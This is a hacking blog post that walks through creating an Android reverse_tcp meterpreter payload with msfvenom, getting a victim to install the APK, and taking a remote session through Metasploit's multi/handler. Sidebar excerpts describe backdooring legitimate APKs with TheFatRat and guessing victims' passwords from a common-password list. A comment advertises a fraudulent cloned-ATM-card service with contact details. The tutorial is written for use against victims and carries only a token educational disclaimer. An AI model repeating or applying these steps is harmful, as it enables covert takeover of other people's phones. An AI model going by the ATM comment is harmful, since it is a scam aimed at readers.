Skip to main content

HOW TO HACK ANDROID USING PAYLOAD

 CREATING A PAYLOAD USING METASPLOIT



Hey guys!! Today, I am gonna explain you how to create a Payload using Kali Linux Terminal.

In this tutorial, we are going to use the best and wellknown framework. I hope you guess it, Yes! that is  Metasploit Framework. It is one of the best framework among all the frameworks.

What is Metasploit Framework ?

The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.   

Requirements:

1. Pc with Kali Linux installed in it.   

Lets get started:

1. Now open your Kali Linux Terminal !
2. Use the following Command to create a payload using Metasploit:

    sudo msfvenom -p android/meterpreter/reverse_tcp                    LHOST=157.46.254.10 LPORT=4444 R>payload.apk  
    (There is no new line in this command)

 Here:

  • -p = It means we're creating a payload
  • LHOST = your ip address [if you dont know your ip adress, type sudo ifconfig then copy the ipv4 and paste at LHOST]
  • LPORT = we have to use 4444 port because that port is not specifed.
  • Payload = payload.apk is the name of the your apk
 
    So after entering this command the payload will be created in your Desktop





3. You need to send this apk to the victim and this depends on you how  creatively you send this payload to the victim and make him install and open it!!

4. Now you need to access that apk for that open new terminal and type the following commands 
(NOTE:This process should be done after opening the apk by the victim)
  msfconsole
 (type the commands one by one dont type all at once)



4.now we will access our created payload by the following command

use exploit/multi/handler



5. We'll have to setup our payload by typing 
  > set payload android/meterpreter/reverse_tcp

    


6. Now set some options like LHOST and LPORT
 > set LHOST <your ip> 


> set LPORT 4444


7. Now type:
   exploit
  

8. You will get meterpreter connection from the victim. Here you will get the access over that android.

10. If u dont know commands type ?  so now you  get lots of commands 
11. Here is demonstration. I will try with a command to check the root.
 
 check_root

   
HOORAY!! You have hacked an android using payload !!

NOTE: This post in only for Educational process. Dont misuse it !!! 

Author :- Sandeep  
    

Comments

  1. I was searching for loan to sort out my bills& debts, then i saw comments about a programmed cloned ATM card that can be used to hack and withdraw money from any ATM machines around you . I doubted at first but thus decided to give it a try by contacting {skylinktechnes@yahoo.com} they responded with their guidelines on how the card works. I was assured that the card can withdraw $5,000 instant per day & was credited with $50,000 so i requested for one & paid the delivery fee to obtain the card, i was shocked to see the UPS agent in my resident with a parcel{card} i signed and went back inside and confirmed the card work's after the agent left. This is no doubts because i have the card & has made used of the card. This hackers are USA based hackers set out to help people with financial freedom!! Contact these email if you wants to get rich with this Via email skylinktechnes@yahoo.com whatsapp/t: +1(213)785-1553

    ReplyDelete

Post a Comment

Popular posts from this blog

Embed Backdoor in any Android app | Android Hacking | Tricky Hash |

  H OW TO  CREATE A ANDROID TROJAN INTRO Everybody  install and use apps these days. So, the easiest way to hack a android by embed a Backdoor to a normal apk File. Now, install this apk file in your Victim's phone by using some Social Engineering trick.  When it is executed the user will see a normal app but in the same time our Backdoor will be running in the Background. REQUIREMENTS A Legitimate android apk file. Kali Linux  The FATRAT (Linux Tool) PROCEDURE   To embed Backdoor in any legitimate apk, we use fatrat. We have to install Fatrat in out terminal. Fatrat is used to generate local or remote listeners. It can generate payloads in various formats.  To Install Fatrat we'll have to use the following commands:  git clone  https://github.com/Screetsec/TheFatRat.git After cloning into TheFatRat now type: ls (enter) cd TheFatRat (enter) ls (enter) chmod +x setup.sh (enter) ls (enter) ./setup.sh (enter) It will automatically install all the required dependencies please be pa

Linux for Beginners | Tricky Hash

Linux Operating System is the best known, free and open source operating system. Linux is broadly used in operations of server based machines, security tools and number of such categories. Fedora, Cent OS, Ubuntu, Debian are one of the famous flavours from Linux family. If you are looking to experience Linux Operating System, then it is highly recommended to make yourself aware regarding few important commands.  There are generally two types of user in Linux, Regular User who celebrates limited access and Root User who celebrates complete access. Let's see few master terms and commands every beginners should know in Linux OS: • Root User : Root User in Linux celebrates access on all the commands and files. • man : This "man" command provides complete manual of any command. For example: "man passwd" • locate : This "locate" command helps user to find the files by name. • ls : This "ls" command helps to list the table. • pwd : PWD here stands

How to Guess any Password like Hackers Do | Password Cracking | Ethical Hacking |

In this article, I am going to tell you how Hackers and Crackers crack the password by Guessing. After reading this, you will be able to start think like a hacker. They use some methodologies while guessing and cracking passwords. So let's dive into it:  1. Guess the most common passwords At the end of every year, a list of the 25 most common passwords is released. These passwords are the easiest to guess and thus the most commonly hacked. Though you should avoid picking any of these passwords for yourself, try guessing from this list of passwords: 123456@  12345678  abc123  qwerty  monkey  letmein  dragon  baseball iloveyou  trustno1 1234567  sunshine  master  123123  welcome  shadow  Ashley  football  Jesus  Michael  ninja  mypassword  password1 2. Use some common password tricks  Other than guessing the most obvious passwords, there are a some tricks that are used by hackers. They know, for example, that there's at least a 50% chance that a victim's password will have on